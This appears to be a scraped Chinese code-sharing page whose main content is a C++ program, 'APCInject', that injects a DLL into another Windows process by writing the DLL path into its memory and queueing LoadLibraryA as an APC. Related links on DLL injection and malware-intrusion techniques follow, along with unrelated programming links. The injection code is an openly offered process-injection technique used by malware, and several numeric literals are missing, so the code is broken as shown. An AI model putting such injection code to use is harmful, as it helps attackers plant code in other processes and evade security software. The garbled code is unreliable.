#include <iostream>

 #include <Windows.h>

 #include <TlHelp32.h>

 using namespace std;

 /*

     APC注入条件:

         目标线程处于可唤醒状态

         如使用以下API时就处于可唤醒状态

         SleepEx, SignalObjectAndWait, WaitForSingleObjectEx, WaitForMultipleObjectsEx,MsgWaitForMultipleObjectsEx

     参数dwPid默认为0,表示自动创建目标进程并立刻生效注入,否则,注入现有目标,等待目标唤醒时执行APC回调

 */

 BOOL APCInject(char *dllUrl,DWORD dwPid=,char *exeUrl=NULL);

 int main(void)

 {

     cout << APCInject("c:\\desktop\\test.dll",) << endl;

     return ;

 }

 BOOL APCInject(char *dllUrl,DWORD dwPid,char *exeUrl)

 {

     HANDLE hSnap=NULL,hPro=NULL,hThr=NULL;

     BOOL bOk = FALSE;

     LPVOID hVir = NULL;

     THREADENTRY32 te = {};

     if (!dwPid)

     {

         STARTUPINFO wi = {};

         PROCESS_INFORMATION pi = {};

         wi.cb = sizeof(wi);

         CreateProcessA("c:\\desktop\\123.exe",NULL,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&wi,&pi);

         hPro = pi.hProcess;

         hThr = pi.hThread;

     } else {

         te.dwSize = sizeof(te);

         hPro = OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwPid);

         if (!hPro)

             return FALSE;

         hSnap = CreateToolhelp32Snapshot(,dwPid);

         bOk = Thread32First(hSnap,&te);

         while (bOk)

         {

             if (te.th32OwnerProcessID == dwPid)

             {

                 hThr = OpenThread(THREAD_ALL_ACCESS,FALSE,te.th32ThreadID);

                 break;

             }

             bOk = Thread32Next(hSnap,&te);

         }

         CloseHandle(hSnap);

     }

     if (!hThr)

         return FALSE;

     hVir = VirtualAllocEx(hPro,NULL,strlen(dllUrl)+,MEM_COMMIT,PAGE_READWRITE);

     if (!hVir)

         return FALSE;

     if (!WriteProcessMemory(hPro,hVir,dllUrl,strlen(dllUrl)+,NULL))

         return FALSE;

     CloseHandle(hPro);

     if (QueueUserAPC((PAPCFUNC)GetProcAddress(GetModuleHandle("kernel32.dll"),"LoadLibraryA"),hThr,(DWORD)hVir))

     {

         if (!dwPid)

         {

             ResumeThread(hThr);

             CloseHandle(hThr);

         }

         return TRUE;

     }

     CloseHandle(hThr);

     return FALSE;

 }

APCInject的更多相关文章

  1. 安全之路 —— 利用APC队列实现跨进程注入

    简介 在之前的文章中笔者曾经为大家介绍过使用CreateRemoteThread函数来实现远程线程注入(链接),毫无疑问最经典的注入方式,但也因为如此,这种方式到今天已经几乎被所有安全软件所防御.所以 ...

  2. Windows Dll Injection、Process Injection、API Hook、DLL后门/恶意程序入侵技术

    catalogue 1. 引言2. 使用注册表注入DLL3. 使用Windows挂钩来注入DLL4. 使用远程线程来注入DLL5. 使用木马DLL来注入DLL6. 把DLL作为调试器来注入7. 使用c ...

  3. 注入 - Ring3 APC注入

    系统产生一个软中断,当线程再次被唤醒时,此线程会首先执行APC队列中的被注册的函数,利用QueueUserAPC()这个API,并以此去执行我们的DLL加载代码,进而完成DLL注入的目的, 1.根据进 ...

  4. Inject-APC (Ring3)

    1 // APCInject.cpp : 定义控制台应用程序的入口点. 2 // 3 4 #include "stdafx.h" 5 #include "APCInjec ...

随机推荐

  1. linux命令ln

    创建软连接 ln -s 源文件   目标文件(指向源文件) ln -s /home/test/ /wang

  2. P2746 [USACO5.3]校园网Network of Schools

    传送门 把所有学校的关系构成一个图,显然一个强联通分量的所有学校只要有一个有新软件,其他学校也都会有 考虑缩点,发现入度为 0 的块一定要给,因为没有其他人给它 入度不为 0 的块一定有其他人给,我们 ...

  3. Angular2.0的学习(四)

    第四节课:数据绑定.响应式编程和管道 1.数据绑定(插值表达式.事件绑定.属性绑定.双向绑定) 2.响应式编程 3.管道

  4. RetryException

    public class RetryException extends Exception { public TempestRetryException(Throwable e) { super(e) ...

  5. 转 基于MySQL MEB的备份恢复

    几种备份方式的介绍 mysqlbackup是一个热备份工具.也就是说它不像mysqldump那样给表上一个全局锁,由于mysqldump上了这个锁,所以就造成客户端只能对 数据库进行读操作不能写,这也 ...

  6. Visual Studio 使用

    目录结构 solution_dir Debug: 存放Debug版本信息的.exe Release: Release的.exe .sln: visual studio 项目文件 project_dir ...

  7. 文本编辑简体中文专业版EmEditor Professional v12.0.8(12/27/2012更新)姓名+注册码

    这是一个简单好用的文本编辑器,支持多种配置,自定义颜色.字体.工具栏.快捷键设置,可以调整行距,避免中文排列过于紧密,具有选择文本列块的功能(按ALT 键拖动鼠标),并允许无限撤消.重做,总之功能多多 ...

  8. C#简单代码转移数据库数据

    using System;using System.Collections.Generic;using System.Linq;using System.Web;using System.Data;u ...

  9. LitePal——安卓数据库library

    简介:一个让开发者使用SQLite数据库更加容易的库文件 LitePal for Android,项目地址:点击打开 LitePal是一个开源的android库,它让开发者使用SQLite数据变得容易 ...

  10. 大数据kafka视频教程 学习记录【B站尚硅谷 】

    视频地址: https://www.bilibili.com/video/av35354301/?p=1           2019/03/06 21:59 消息队列的内部实现: Kafka基础: ...